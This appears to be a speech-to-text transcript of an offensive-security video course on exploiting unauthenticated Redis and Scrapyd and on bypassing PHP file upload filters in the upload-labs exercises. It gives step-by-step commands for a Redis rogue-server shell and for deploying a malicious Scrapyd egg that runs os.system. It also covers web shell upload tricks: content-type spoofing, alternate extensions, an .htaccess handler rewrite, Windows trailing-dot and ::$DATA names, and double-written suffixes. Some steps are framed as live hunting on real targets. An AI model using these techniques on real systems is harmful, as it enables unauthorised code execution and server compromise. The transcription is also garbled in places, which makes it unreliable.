so Redis is usually used as first session, or you can say caching, serialized session caching, serialized data storage. Okay, data storage. Okay, second, pub or sub messaging service. Okay, service. Third, message broker for asynchronous task queues. So these are the services these are the, you can say, Redis used for services Redis provides. Redis by default work on this port 6379, okay, by default on 6379 TCP, okay. So if you found any port on 6379, you can try this Redis vulnerability. Now so this is all about the background concept of Redis. Now we'll see in next video, we'll see Redis unauthorized access vulnerability. Hello friends, now I'm going to talk about hunting for unauthorized access for you can say Redis server, okay. So it's very easy, you just need Redis tools. First of all, install in your applications, this one, okay. Install your operating system, this one. I already installed and I have a server. I'll just do nmap space -p 6379 as the by default ports of Redis, okay. Now after that I will use IP address of target systems 31.76, and I got to know the Redis is over there, Redis server installed over there, and it's filtered, not an issue. Now I will try to connect with Redis CLI, okay, command line interactions -h, and I got a hint. So okay, -h used for host name and the port you can give default, they will take this port, okay. Now so let's try to connect the Redis CLI space -h 192.168.31.76. you can see I'm connected. You can take help, and help will give you group to get a list of commands in a group for help command, okay. Tab to get list of possible help, tag to whatever they set hints, okay. Now let's say I want get my pass WD, okay. So I'll use this get my pass, or let's do info, okay. So if I'm doing info, I got to know, okay. So total connection received 2, commands process 4, or you got the stats of Redis. It's a unauthorized access, yes. Now let's do this one, get my pass WD. What's more from password, okay. So get my get my pass WD. You got see there is no password, so it's coming nil, okay. So I have understood the vulnerabilities, how to connect unauthorized Redis server, yes. Hello friends, now I'm going to talk about live hunting for Redis, okay. So I have the target. First I will scan through nmap whether Redis is running or not. So nmap, you can use -p directly port 6379 and the IP address, and here I got to know it's open and Redis is right there, okay. Now you can also check -S for the version recognition. Just wait. And I got to know Redis key value is stored 5.0.5. Now I want unauthorized access of this Redis server. So for that I'll use Redis command line, okay, interactions. Now after that -h, and then host is this one, the IP address. So there should be some authentication. If there is no authentication, it's a vulnerability, yes. So let's try this one. Connected, info, you can see. So we got to know complete informations. You can even still get my password, and there is nil. So this is a way to hunt this kind of vulnerability. Thank you so much. In the next video we'll see exploitation of this vulnerability to lead RC. Hello friends, welcome back. So now I'm going to talk about Redis RC, okay. So we got to know the unauthenticated file read access, yes. Now we'll convert into RC. For that you need exploit, and for this you need a Redis module SDK, okay. So this is a good Redis rogue server. Okay, just download this. So I already have. Let me exit this first. Okay, cd home Offensive Hunter, and there will be a Redis rogue server. Okay, now you simply first go to the Redis module SDK. There you simply make have some error. Go to the exp, make. Okay, make done. After make, go back. You just compile. Okay, you just compile this Redis module SDK. Okay, now syntax is very easy. Syntax is very easy for this one. Okay, so /redis route server .py space -- r host. Okay, r host, let's give 192.160 whatever, yes, dot 31.76, and then you give -- l host, and there you have to give your local host. If you're trying this on a remote server, a public IP address, you need a static public IP address over there. Okay, so 31.76. if you don't have public IP address, you can use ngrok. Okay, let's enter and allow 21,000 port. Okay, you can see what do you want. I want interactive cell, yes, enter. Interactive mode start, yes. Now you can give ID, yes. pwd ls, there is no data. Who am I? You are the Redis user. So that's it. This is a way to exploit this vulnerability. Thank you so much. Hello friends, welcome back. So now I am going to talk about attack scrappyd crawler. Yes, so Scrappy is a very popular crawler framework under Python. Okay, so let's talk about scrappyd. Scrappyd is an application for deploying and running Scrappy spiders. Okay, it enables users to deploy means you can say upload projects and control their spiders using JSON API. Okay, JSON API. So let's talk about what you have to do first of all. Okay, generally scrappyd work on 6800 open ports. Okay, so you just do nmap and you will get scrappy is running or not. So let me simply go back and I will be doing, okay, I lost the connection, let me reconnect. Perfect. nmap -p 6800 192.168.31.76. let's try this. You can see it's open, but I don't know it's scrappyd or not. Okay, so you can simply browse on the web interface and you will get to know scrappyd is running. Okay, now, or a simple method can also be through you can say spider this, and if you will get user agent Scrappy, that means they are using Scrappy crawlers. Okay, now now how to attack scrappyd basically. So scrappyd mainly provides the following APIs. Let's talk about the API. What are the APIs scrappyd provides? Okay, and that you must remember. Okay, so the first provides / you can say daemon status. Okay, daemon status dot JSON. Okay, get the status of the cloud services. Okay, so let's try this now, and if you try this over there, you'll get to know. Okay, this is the container status. Okay, pending 0, running 0, finished. Okay, now there is another, it's called add version. Okay, add version dot JSON. This will upload a new crawler project or update the code of an existing project. That means you are getting upload function. Yes, if this will be able to You can see you will be able to upload anything through post method. Yes, post method are enabled over there. Yes, yes. Now there are a few more. Let's say schedule.json. This will give you performs a crawler task. Okay, so if you visit this, you will get all the what are the crawler task we will going to perform. Yes. Now there cancel.json. Cancel.json is for stop and cancel a task. Okay, stop and cancel a task. There is a list projects.json. This will give you the list of all code version for a project. Okay, let's try this. Okay, so list projects.json. Let me try this one. Okay, you got to know there is only evil project. Okay, right now. Okay, perfect. Let's, if you want to, let's say version, you just have to give list versions.json. Okay, list spiders, list all spiders in a project. Okay, so list spiders.json. Okay, what are the spiders in this project? Okay, so let's open this. There are no project. Okay, now there are list jobs.json, list all tasks including 3 states in progress. Okay, so list, it's say jobs. Okay, list jobs.json. Okay, let's try this now. Okay, there are no tasks. There is again delivers cn.js, delete a code version under a project. If you want to delete, you can delete. Okay, deliversion. So it's deliver cn. Okay, .json. Okay, if you want to delete any code or any items, you can use this JSON file. Okay, so let's try this one. There are no such resource right now. Okay, so in simple terms, there can be multiple projects under the ScrappyD cloud service. Okay, and each project can have multiple code versions. Each code version is a complete Scrappy project, and there can be multiple spiders under a Scrappy project. So that's why we have to gather all the information. Okay, and how to exploit this? An attacker can create a project and deploy his own version of a Scrappy code, deploy malicious code to the cloud, and then attack the ScrappyD cloud. Okay, so what we have to do now to exploit that we'll see in next video. Thank you. Hello friends, now I'm going to talk about how to exploit ScrappyD. If you got to know the port is open and ScrappyD is running in background, you can exploit this. So first you need a Scrappy and a ScrappyD client. Okay, so first pip space install space Scrappy, do this. Okay, so this is my Ubuntu machine. I will simply install. Let me first go to the root. Okay, perfect. So I'll use pip space install space Scrappy. Okay, and Scrappy is installed. Now what about a ScrappyD client? Okay, so client is also installed perfectly. Now you have to start a evil project. Okay, so for that you have to use a command called Scrappy. I hope my spelling is correct. No, Scrappy, SCRAPY, Scrappy start project space. You can give any project name. Let's say I'm giving evil. Okay, for example. Okay, so just fire this command. So you just started a project. Now you can start your first spider with cd evil. Okay, so cd evil. I just went to cd evil. Now there's the evil directory. Okay, so you go to the evil directory again, or you can simply directly edit. So if you go to the evil directory, you will find there is a init.py, and that there you have to write some code over there. Okay, so I'm going to write a code over there now. So nano space underscore init.py, and I'm going to write a code import os, and there os dot system. Okay, I hope the spelling is correct. os dot systems, and in system I am going to create a file. It's a touch Vikas, for example. Okay, Perfect. Let's end this one. So I have a file. I have a evil file, malicious code into the ini.py. Now what I'm going to do this, I will reproduce, I will build the evil egg archive. Okay, so let's go back. ls. Okay, so I'll build a evil egg archive. Okay, for that you can use a command called scrapy, scrapyd, scrapy d hyphen deploy. If you want to upload or something, you will deploy hyphen build dash egg space or equal to egg dot equal to evil dot egg. Okay, perfect. Let me do this. So okay, and here you can see one file generated. It's evil dot egg file. Okay, now let me give permissions perfectly. Now how to upload this evil file to scrapyd server? We have got earlier, yes, remember there was one file, the file name was add-version.json. okay, that file, that's nothing but its upload functionality. Okay, now so to use a command called curl space url. Okay, so I'm giving, okay, let me go add-version.json. so I'm giving this url. Okay, perfectly. After that hyphen f project. Okay, so hyphen f, you to give project. Okay, so let's give the project. Okay, perfect. Project equal to evil, I'm giving the name evil. Now hyphen f for version. Okay, so version I'm giving, let's say our version, you can say hyphen f version if spelling is correct, R01. Okay, it's up to you. Hyphen f again egg, what will be egg equal to @evil dot egg. Okay, so I'm going to upload this file. Let's enter. You can see status okay, project evil, version went, and that's uploaded. Now if it's uploaded, let me check it's executed or not. So I have a lab, this is scrapyd lab, so I'll simply use docker space ps. Okay, so I have the container, this is the container, so I'll use docker space hyphen it, this one, the container name, and execute ls. Okay, there is some problem. Let me try what's the problem. Okay, okay, so the docker exec space hyphen it, and then it give a container name and then command, let's say ls, and you can see Vikas created over there. Yes, so that means command successfully, you wrote a file successfully over there. So the vulnerability, you understood the vulnerability. It's called scrapyd unauthenticated remote code execution. Thank you so much. Hello friends, welcome back. So now I'm going to talk about live hunting scrapyd. So I'm going to talk about live hunting scrapyd now. So this is my target, and do one thing first, port scanning. So this time if you'll do nmap space IP address, let's try this now. Okay, forget about this one. Okay, for port scanning you can do now what I found the directly port, and I found on 8099 add version.json. Okay, and if I'm loading this one, you can see I'm getting a status error because there is no file right now. Expected one of B head and the post method allowed over there. Same thing I'm trying on this target. I'm getting an error. Yes, this target is there is authentication now. So that means it's a vulnerable and the post method allowed over there is I can upload any file over there. So what I have to do now, we have to build first. See, the port is open now. You have to check every port, okay, whether it's a Scrappy D or not. Okay, so this time you can see it's a Scrappy D running in the background, okay, and available projects evil because I uploaded few minutes ago. Okay, that's why. Now I'll do one thing. First, you have to build a egg. So how to build egg is okay. What you already build this evil.egg by. Okay, now upload evil egg to the Scrappy D server. How to upload? It's very easy. Curl space URL. I already have the URL, not this URL. This URL you need. Okay, add version.json. After that, -f project name. Let's say evil again. One more time. Okay, evil or evil2. After that, -F version. I'm giving again same version R01. After that, -F egg equal to @evil.egg that I had built already. Okay, so I don't have to buy evil twice. Okay, now just enter this. Setting file evil.egg fail return funny value. Yes, so let me give the same name. Okay, sending value. Okay. Nice. Read function return funny value. Okay. Okay. Now, why is this error is there? Okay, let me try one more time. Curl URL is perfect at version.json -f project equal to evil -F version R01 01 or okay, let's try this one more time. 01 -F egg equal to @evil.egg. Okay, and okay, the problem is evil. Okay, this one. Okay, that's why the problem was. Okay, now it will work. See, it's worked. Okay, so it was my mistake. Okay, if you can give project evil2, it will definitely work. Yes. Now if we'll go back over there, let's go back. File created over in the background. You can see evil is there, evil2 is there. Yes, so you successfully able to upload something over there. This is a way. This is live hunting. So now I'm going to talk about lab setup in Windows. That's important, okay? Because few lessons are based only on Windows file systems, okay? That's why. Let me show you how to set up, okay? Now you need a WAMP server, okay? So the WAMP server you can download from Google. Simply search on Google WAMP, okay? WAMP server download, and then you can download a WAMP server from the first link, okay? And then you can download and install a basic installation now. When WAMP server will be installed, you can click on this first file, then go to the Apache, and there is a httpd.conf, okay? You have to edit this file, okay? What you have to edit this file, let me show you. Let me search directly, okay? So I'll get a hint. Okay, so in this path, okay, format, font, okay, you have to edit, you have to add a line, okay? There will be a something like this,
required local. Okay, instead of required local, you add allow from all. Okay, allow from all, and then allow override all. Just add a tab and then order allow deny. Okay, that's it. Okay, these two lines you have to add. Okay, so it will be accessed from your network. Otherwise, you should access from localhost. Okay, now then you need a setup. Okay, setup from the same GitHub link. Uploads labs env. Okay, this directory, and then you need a www and just copy Control A, Control C. Okay, copy this. After copy, click on the WAMP, then www directory, and simply paste over there. Control A, Control C, paste, or you can create a directory and you can paste over there. Okay, like this, and do for yes. Okay, after paste, you can simply open a local host. Okay, when you open local host, you'll get something like this one, and then obviously you can access by lab. Okay, pass 1, pass 2, and then you can enjoy this malicious file uploads all the labs. Very important. Okay, thank you so much. Hello friends, welcome back. So now I'm going to talk about advanced file uploads. So first we'll be setting up labs. We'll have set up a lab for this file upload situations. You can simply use git space clone, and this is a link. Okay, it will download a folder upload labs. Then you change your directory to the upload labs, and then docker cd upload labs dash docker. Docker is a directory. Then make sure docker is installed in your laptop. Okay, so after that, docker space build space -t and then upload dash labs dot. This will build the requirements for upload labs. Then you can run this docker space run space -d space -p port number 80 to 80 inward outward upload labs colon latest. This will run the labs like this. So I already set up a lab and I got this one. Okay, and this have 21 situations and very good situations. Okay, you can even, it is in Chinese, so if you click on this, you'll be able to get the code. Okay, so let me reload one more time. Okay, perfect. Okay, basically I disabled JavaScript. Okay, so you can try this in Chrome. Let me show you. And then I click on this one. So JavaScript code, the code of this is written over there for your help, and then you take help and then try to upload a file, malicious file, into these situations. Thank you. In the next video, you will see how to upload the malicious files. Okay, different situations. Hello friends, now we have a first task, pass-01, upload one web cell to the server. Please select an image to upload. Okay, so now I want to upload a file over there. So what I will do, I'll write a code, PHP code. Let's say PHP space PHP info, a very simple code, yes. And then this one. Let's save desktop. I'll save as a ABC a cell.php. Okay, and I want to upload this PHP code there. Okay, so I'll select a desktop space cell.php. Let's upload. But the problem is right now they're expecting only jpg png.gif, and this is a JavaScript prompt. Okay, so if you look for the source code, function check file var document get element by name. So there is a JavaScript and they are taking your name. If null file return false, and this is JavaScript code only. This is not the actual function. Okay, now what I will do, I'll disable the JavaScript like I have disabled in the Firefox, and now I'll upload over there. So let me upload there. abc.php upload. Uploaded successfully. I simply disable JavaScript code. Okay, copy image. You can go there. Okay, copy image locations, not copy. Okay, let me do this, and you can see you got this. Okay, I uploaded ABC. Let me upload the cell. Okay, so I'm uploading cell.php now. Uploaded. Right click, copy image locations, and okay, done. Cell.php. So how I disable? You can simply go to the about. Okay, about :config, I guess. Yeah, then accept the risk, and then you can search over there JavaScript, and you can make it false. Okay, that this is a way you can disable let me enable. Now I enabled. Now if I'll upload this file one more time, let's upload cell.php. Okay, sorry, cell.php. Let's upload. Okay, it's upload because I have to restart the browser. Okay, that's why. Okay, let it false. Okay, cool. So the first challenge we have passed. Okay, the first challenge was only just to disable JavaScript and upload any file. So they were checking only this file, JPG, PNG, GIF. Okay, so if I'll disable the JavaScript, they will exclude this JavaScript execution on the browser side. Okay, and they will let you know to they will let you upload the file. Thank you, thank you. Hello friends, welcome back. So now again we are in the situation file advanced file uploads. We are in the series of advanced file uploads. Now I'll be talking about content type bypass. Okay, so basically few applications have restrictions. Okay, let me pass to what's the pass to? Let me check in the source code first of all. Okay, let's go to the pass to. Done. Okay, now cool. So upload one web cell to this web server. Please select an image to upload. Now if you will upload an image, let's say I'm uploading a very simple image. Okay, let's say 2.jpg. Okay, let me upload this one. Uploaded successfully. Yes. Let me check how this code works basically. So by reading this code, there is upload false. Okay, message null, post submit. If file exists, upload path. Okay, and if file, so if you're any selecting there is type, they are expecting only type image slash JPEG, image slash PNG, image slash GIF. That means you can only upload these many types of image. Okay, so it's nothing but it's a content type in the request body. Okay, so and then it will be uploaded successfully. Let me select one. Okay, let me jump to the Firefox now. Okay, now I'll select one file. Let's say 2.jpg. Okay, this is second lesson, so I'm selecting 2.jpg. Now let's capture this request. Okay, so I capture the request. Okay, I got the request, and the request there is a content type image slash JPEG. Okay, and the file name is 2.jpg. Perfect. Now if you forward intercept is off. Okay, cool, not an issue. It will be uploaded. Now I want to upload the cell.php. Okay, cell.php intercept is on. Okay, let's capture. So I capture this cell.php request. Let me send this to repeater for the backup purpose. In the repeater, if I click on the go, the response will be something else and it's not uploaded. Okay, there is some error. It's not uploaded. You can see the error is this one. Okay, now I'll do one thing. Let's make it cell.php to 02.php. Okay, for we'll understand very easily then. Okay, now instead of this content type text slash php, what if I'll give image slash jpeg. Okay, let's try this. Go. Okay, so maybe JPEG was not in the case. JPEG was the case. Yes, you can upload it. Image slash JPEG. Yes, image slash JPEG. Yes. Okay, what happened then? Render. It's uploaded successfully. There is no error. Yes. So where it uploaded? Let me upload 2.php. See, it's upload there. Upload test 2.php. Now, okay, let me copy this one. Proxy intercept is off now. Now let me browse that one. Okay, so there is upload test2.php and it's executed successfully. See this? Cool. So this is a way to do this. Okay, this is nothing but we uploaded, we just truncate the upload package, we change the content type to image slash JPEG and release the packet, and this way we bypass the content type restrictions. Okay, the file type restrictions. Hello friends, welcome back. So now I'm going to talk about suffix blacklist bypass. Yeah, that's true. So let me show you. This is a challenge 3. Okay, and that's saying if you look at translate to English. Okay, upload one web cell to the server. Please select one image to upload. Let's take the source code. If you look the source code, file exists and they are blacklisting few things. They are blacklisting ASP, ASPX, PHP, JSP. So obviously you cannot upload .asp extension, .aspx, .php, .jspx suffix file. It is a blacklist type. So you need to upload a special resolvable suffix, and that may be this one. So you should try to upload something like this: PHP 2, 3, 4, 5, like this. Okay. So you have to try to upload. So let's try this now. So if I'm trying now, let's capture this request. Challenge 3. Okay. Let's capture sail.php. Perfect. And I have intercept is on now. Okay. So I just capture this request. I'll right click send this to repeater. If you directly upload this one, there is some error. Okay. You cannot upload .asp, .jspx, .php. Now, but we can upload .php2. Let's try this now. .php2. Yeah, it's uploaded. Perfect. It's uploaded. Now, if let's open this one. Upload. Cool. Let me try to do this. Upload. But the problem is right now it's not parsed. It's not executed. Yes. It's a text.php, but still it cannot pass. So maybe, see, it uploaded successfully, but were not passed. So it may be because of the configurations, okay, and because of the configuration, it's not resolving successfully. So here are some suffix you need to suffix that can be passed and executed by the PHP parser. So here all see we don't know how many PHP parser, which are the files they are executing as a PHP parser. So first is called PHP star class. Okay, star class. This may be PHP2 for Ubuntu. So PHP star class may have .php2, .php3, .php4, .php5. So you have to try one by one. Okay, .php6, .php7. Because some suffix names that can be parsed and executed by the PHP parsers from PHP star class will be this one. Okay. PHP2 will be work with LAMP server and Ubuntu 12.4 server. Okay. Now there are one more class. It's called .ph star class. So .ph star class may have .pht, .phtm, and there's .phtml as will be passed as a PHP. Okay. And there are also parsing the vulnerability class. Some will be parsing the vulnerability class, maybe something like this one. .php .gif. Okay, you can give and it will be parsed as a PHP, or maybe .php, or you can give .jpg %00.php. Okay, it will be passed as a PHP. So these are the suffix blacklist bypass. Now let's try this one. I'll first try PHP3 now. Let's click on the go. Now when I tried PHP3, it's uploaded successfully, and I don't know whether it's parsing as a PHP or not. So I'll try copy and let's do this. Cool, it's executed. Yes. So this is a way to bypass what suffix blacklist. Hello friends, welcome back. So now I'm going to talk about, it's called file parsing rules bypass. Okay. So basically the applications, let's talk about this at 4. Okay. Applications, if you look the source code, okay, applications filter every possible thing. Okay. Now, so basically it's blacklisted almost all suffix except .staccess. So yeah. So basically they bypass every possible PHP suffix. Okay, every possible. So try to upload a non-existing suffix name. Okay. So I'm going to try to upload, let's capture any request first. So I'm going to capture, let's say, sail.php. Okay. And let's submit. So right click send this to repeater. Okay, repeater. Now I'm trying to upload a non-suffix. Let's say non-suffix will be, let's say, triple P. You can say yes. So when I try to triple P, it's uploaded successfully. Yeah. See, but obviously it won't execute because it will be download. Okay, now, and I got to know the .stxs is not filtered, and .stx I can write or rewrite a file parsing rules into this .stxs. So now I will try to upload a .stxs, okay, .stxs with having a content this one, okay, set handler application slash x dash httpd dash php. That means all the file will be passed as a PHP. So I'm writing a rewrite file parsing rules, okay, by using a .stxs. So when I upload it, .st it's uploaded successfully. You can see now. Now I will upload any other file. Let's say I'm trying to upload, let's say, vikas.pp, having content of this code executions, and that you can say PHP info. Okay, let's try this. Okay, the problem is right now when you uploaded this .stxs, content type will be different. Okay, content type won't be that textless PHP. You can give text slash plain. Okay, that may be the content. Okay, for this one. Okay, let me upload. Perfect. Now when you're uploading, let's say vikas.pp, the content type you can give anything. It will be parsed as a PHP. So I'm giving, let's say, application slash octet dash stream and this one. Let's try this now. So I uploaded a vikass.pp. Okay, let's try to execute upload, and I'm trying now vikass.pp. Okay, vikash.pp. No, it's not there. I guess it's there. Upload viash. Okay, viash. This one's okay. Now see, it's executed successfully. So this is a way you should rewrite files. Okay, so you have to always look for extensions. If you can upload .stxs, that is great. First upload .stxs and try to parse every file into PHP like this one. Set handler, you can use a set handler rules like this one. Okay, so instead of this one, you can directly write this one, application slash xhtp.php. Okay, set handler. This will be content of .stxs. Hello friends, welcome back. So now I'm going to talk about not unified case of suffix. Yeah, that's true. If you look at the source code, let's look at the source code first. Okay, it's a challenge number 6. Okay, challenge number 6. Now let's look at the source code. Source code having .php, .php5, .php4, .php3. Now what about the case sensitive things? Let's try to upload .php like this one, try to bypass this. Okay, so when I look this, they also done this. Okay, but what about the p capital? Let's try this now. Okay, so let's capture the challenge 6 request. Okay, cell.php. Oops. Cell.php. Let's capture this request. So I just capture the request. I'll right click, send this to repeaters. The repeater. Okay. Yeah, cell.php. Now what about I'll upload p capital? Let's try this now. So when I tried, it's uploaded successfully, but I don't know whether it will execute or not. Let's open this. Okay. What if I'll normally upload PHP? Okay, let's try this now. Okay, it's filtered. It's not uploaded. Yeah. Now, what about p capital? Okay, p capital also uploaded successfully. So let's try to access now. Okay, so upload directory. Okay, yeah, it's like worked. Yeah, so this is called, so basically they were blacklisting the case suffix. Okay, and the case suffix was not unified, so we can bypass the case. Okay, yeah, a blacklist was not so strict, and basically the blacklist suffix name should convert to lowercase before executing that one. Okay. Hello friends, welcome back. So now I'm going to talk about blacklist bypassing Windows features. So let me tell you our Windows features. Windows file name suffix doesn't allow spaces. If it exists, if it exists, Windows will remove spaces. Okay, remove spaces. That's a common thing. Okay, common thing. So we'll use these spaces to bypass a Windows features. Okay, for example, let's assume a server is hosted on the Windows platform. Okay, I'm guessing this server is hosted on the Windows platform, so we'll be talking about the 7. Okay, now if you'll upload a direct file abc.php or whatever, it won't work. Yes, and then you'll get error. Now let's capture this request into Bubsuit. Where is proxy? Proxy intercept is on. Let's capture this request with abc.php, not an issue. Perfect. Okay, I just capture this request and it's also going on. Yeah. Now let's right click send this to repeater. So it's a challenge 7. Okay. Now if you're sending this request, file won't be uploaded. Okay, it's not uploaded, message error message. Okay. Now the Windows features, I'm assuming this is on Windows. Okay, and if I look, possibly it is Apache 2.4 Windows 64. Yeah, so it's on a Windows server. Now if it will be a Windows server, you can bypass it by giving a space. So a space, it will be saved as abc.php. Okay, because if you look for the code, let's go for the code. Right now abc.php is there. Okay, so not an issue. Let's look for the code. Okay, the code is denying all the extension .php.php5 everything. Okay, but what about the space? If I'll be give the space, it will go as a php space, but it will replace, the Windows will remove a space. Okay, from the name. Okay, so when you upload abc.php space, it will become php space is not in the blacklist. Yes, php space is not in the blacklist, and it will upload normally. Okay, and then Windows finds that file name written has a space, and it will automatically remove a space. So basically you will be going to upload this file, let's say abc or xyz, let's say challenge 7.php and the space. It's not a bypass, so it will upload as a normally. Okay, upload as normally. Okay, because it's not in blacklist. Yes, so upload it normally. After the normally, Windows will find this file, and this file have a name, space in name. Yeah, now Windows will remove a space. Yes, Windows will automatically remove space. Yeah, then finally it will be 07.php. Yeah, so this is the way. Okay, let's do this now. So I'm going to upload now, let's say 07.php space. Okay, let's click on the go. So when uploaded, okay, it's uploaded successfully, and no, it's not uploaded successfully. Why so? There is some error. Okay, and okay, it's past 7. Okay, what's the error? We don't know. Let me do one thing. Instead of this text/php, what I will give, I'll do, let's say, application/octet stream. Okay, let me do this. Okay, so I'll give application/octet stream. Okay, let me do this. Let's click on the go. Now what's the status? Okay, there's still error. Let me capture one more time. Okay, so intercept is on now. I'll capture cell.php. Perfect. Okay, let's right click send this to repeater for backup purpose. Now I'll try cell.php space. Let's click on the go. Oh, there's error. Okay. Okay. I guess its lesson is incorrect. Okay, I tried on lesson 7, but it's lesson 6. Okay, so let me try on the lesson 6. Okay, lesson 6, lesson 7 have different situations. So let's go to the lesson 6 code. Okay, 6 code, 6 code again the same thing. They are looking for, these are the extension, but they may forgot the PHP space. Yeah. So now I'm trying, let's say, if I'm trying cell.php directly, I'm able to upload. No, you are not able to upload. Yes, there is some error. Yeah. Now I'll try, let's say 06, it is lesson 6, 06.php space. Okay, let's try this now. Okay, now you can see it's uploaded successfully with a space. Yes, but Windows will automatically replace this space, will remove the replace. Okay, so I have a file now. Okay, this is a file, and let me access now. Okay, upload. Perfect. See, so this is a way to bypass the blacklist bypassing Windows feature. It's a lesson 6. Okay, so lesson 6, remember. Okay, cool. Hello friends, so again I'm going to talk about bypassing Windows features, blacklisting bypassing Windows features. So it's a challenge 7 now. Okay, now this time I'm going to suppose to tell you something different. Okay, let's capture. We have seen the spaces. Yes, a space will be automatically removed. Yes, now there is still a blacklist. Okay, now the blacklist is something like this one. If you look at the blacklist of challenge 7, they're blacklisting. Okay, let's go to this challenge 7. They're blacklisting this many things: PHP, .php, .php5, .php4, .php3. Yeah. Now, so they are checking the blacklisting strictly on this .php, .php5, .php4, PHP3, blah blah. Yes. Now, there's a Windows features. Okay, the Windows features. The feature. Let me tell you what these features. Windows file name suffix. Okay, let me check. File name suffix is not allowed. Okay, is not allowed to exist dot okay, this is a dot. Okay, let me tell you, I'm just talking about this dot. Okay, so dot, okay, this dot only. Okay, dot, if it exists. Okay, if it exists, Windows will automatically removed. Okay, removed dot. So the bypass will be how, what if I'll give the file name, let's say abc.php dot. I will upload this abc.php dot because spaces are not working right now. Okay, there is challenge 7 we have seen earlier. Yes, so now I'll upload abc.php dot. So it will process as a normal process. Okay, normal upload. Okay, normally uploaded, you can say normally uploaded. After that, the Windows will find this. Yes, Windows will find this. Yes, and it will automatically remove dot. So it will become abc.php. Yes, let's see this. Let's try. So first, okay, it's challenge 7. So let me challenge 7. Okay, why to capture? I have already the request. Challenge 7. Now I'm trying to upload the file name. Let's say 7.07.php space. Okay, this time I'm trying a space because, okay, but a space not work this time. Yes, not worked. Yeah, there is error. Yes. Now instead of a space, what if I'll give dot? Let's enter. So when I gave dot, it's worked. Yes, see this? Now it's uploaded as a PHP dot, but it will become 07.php. Yes. So let's try this now. It's a 07.php. Cool. Now let's try to access this 07.php. Perfect. See? So this is also a way to bypass this. Thank you so much. Hello friends. So again I'm going to talk about blacklist bypassing Windows features. Yeah, that's again talking about the Windows features, and this time the Windows features, let me talk about data. Data is another feature Data is the default attribute, okay, attribute for storing data streams in the NTFS file system, NTFS file systems. So when Windows server will be there, IIS server will be there, or the operating system will be Windows. So when you will access, let's say, when you will access abc.php, okay, $, data, okay, that means you are requesting for nothing but abc.php, because this represent NTFS file systems, okay, that's it. So your goal is very easy now. If they will blacklist every terms, let's say they are blacklisting, let's capture request now for challenge 8, okay, and I'm assuming that they are blacklisting these are the things. Now how you gonna upload files? But they're not filtering $data. Yes, these are not terms, these are not filtered. Yes, so now I'll capture the request. Let's capture this request. Intercept is on now. Let's select any file, abc.php. Okay, cool. I just captured this request. I'll right click, send this to repeater. Now repeater. Now see, my goal is to upload, let's say 08.php, but the problem is they'll throw one error because they have the blacklist features. Okay, now I will try space first of all. Okay, space again, they blacklisted, they're still error. Yes, now I'll try dot. Okay, they even filtered. Yes, now I know it's a Windows system, so I'll hit a try, last try. Yeah, what I will hit, so I'll hit this one. It's nothing but after PHP I'll give : dollar data. Okay, so I'm giving this one. Let's try this one. Okay, so when you tried this one, it's uploaded. Yeah, it's uploaded, and this represents nothing but a Windows file systems. So now just wait, let's try to access this one only. Okay, perfectly. See, we uploaded a PHP. Okay, so this is another way to bypass, okay, bypass Windows features. Okay, thank you so much. Hello friends, welcome back. So now again I'm going to talk about blacklist bypassing Windows features. Okay, very important. Yeah, very important sections. Yes, let's try this now. So it's a lesson challenge 9. Okay, now challenge 9. So obviously I will capture a request. Let's say abc.php. Let's capture this request. Intercept is on now, so I'm just capture this request. I'll right click, send this to repeater. Now at the meantime I'll check the source code. Okay, so let's check the source code. Challenge 9 show code. If you read this, okay, perfectly, not an problem. They okay, huh, okay, image path, upload path, the slash file name is coming, okay, directly. Okay, perfectly with dot concatenations, not an issue. Okay, cool, no problem. Let me directly do this. So they're in filtering. So now I'll use a combination abc.php dot. Okay, let's try this dot. Okay, it's not worked. There is error. What about space? No work. Okay, it's not work. They filtered every pattern. Okay, now, okay, let me do this. 09.php. What if I'll use .php dot? Okay, no, it's filtered. Yeah, it's filtered. It's not worked. Okay, now what else? .php dot space. Okay, it's filtered. What if I'll .php dot space dot? This time it's uploaded. Yes, now let me teach you what happened. So basically here I combined few things. Okay, so blacklist was there, but it's not so strict. Okay. Now I use this one. I used let's say 09.php dot space dot. Now it will basically first the applications deleted the dot and end of the file name. Okay. So basically it became 09.php, yeah, dot space. Now it's uploaded and no, go see it's uploaded as a normally now. Okay. So basically, and we know that, so and becoming, so it will become the php.php. Okay. So basically it's become 09.php dot. Okay. Now this one, they filtered a space. Okay. Now the php dot suffix not in the blacklist. Okay. It's not blacklisted. Okay. So it's bypassed the bypassed blacklist filtration. Okay. It bypass blacklist filtration. Okay. If you observe correctly, it's bypass the blacklist filtrations. Now after bypassing the filtrations, Windows file system found it. Okay. And Windows file systems automatically removed the dot. Yes. So it became 09.php. Now you can simply go to the upload. Yes. If you can just stream there. Yes. File exists. Yes. File exists with replaced with upload path. Yes. Now they filtered the dot. Yes. This file exists string character dot. They filtered the delete dot. See this, first they use delete dot trimming. Okay. Delete dot, then string character dot. Okay. File exists. That's why the dot, they deleted the dot first one. Okay. Now it became the space. Now php dot is not filtered over there. Yes. So it's trimmed. Yeah. Now let me go there. Okay. It's upload slash. Okay. Okay. Where it's uploaded. Let me check. 09.php. So now if I'll check 09.php, it will work. Yeah. Perfectly. So basically first what happened, first see, let me read the source code now. Okay. And I'll explain you what happened. When I passed 09.09.php, okay, space, the php dot space dot. Okay. So first trim nothing. Okay. There is use delete dot function. So it's deleted the dot, delete the dot at the end of the file name. Okay. Now then it convert to lowercase. Okay. So not an s to lowercase, they converted. Okay. Now there is a remove a string function. Okay. So if it's coming, let's say $data or something, it will remove the string. Okay. Okay. Now there is a options. Okay. There is trim again. So go blank at the beginning and end. So blank at the beginning and end, that means they will remove the space. Now you have php dot. Okay. 09.php dot. Obviously php dot suffix is not in blacklisted. There is no php dot suffix in blacklisted. So it will bypass the verification of blacklist. Okay. And then Windows, you know what Windows will do. That's what I explained you. Hello friends, welcome back. So now I'm going to talk about double write bypass method. So what is this basically? Just assume they're blacklisting. Let's go to read the code first of all. Okay. So it's nothing but past 10 source code. Okay. So now see the source code. They have a deny existent PHP, PHP5, PHP4. Okay. PHP3. There is no dot. Okay. They're removing the word. Okay. If your word contain PHP, it will remove. It will trim. Okay. That's the thing. Okay. Now, so that means if you give .php, it won't upload because they will filter this. Okay. Yeah. You cannot upload this one. So you cannot upload .php because they're filtering this. Now, what you gonna do now? What if I'll give PHP? Okay. And in that, I'll also type PHP. So what will happen? They'll filter this word and it will become PHP. Yes. So this is a way to bypass this. Okay. It's called suffix is replaced with an empty one, so you can use double write to bypass it. Okay. So P after filtering PHP, it will be spelled as a PHP before and after. Yes, that's the goal. Okay, to bypass this. Okay. So let me show you. Let's capture this 10. Yeah. Okay, it's a 10. 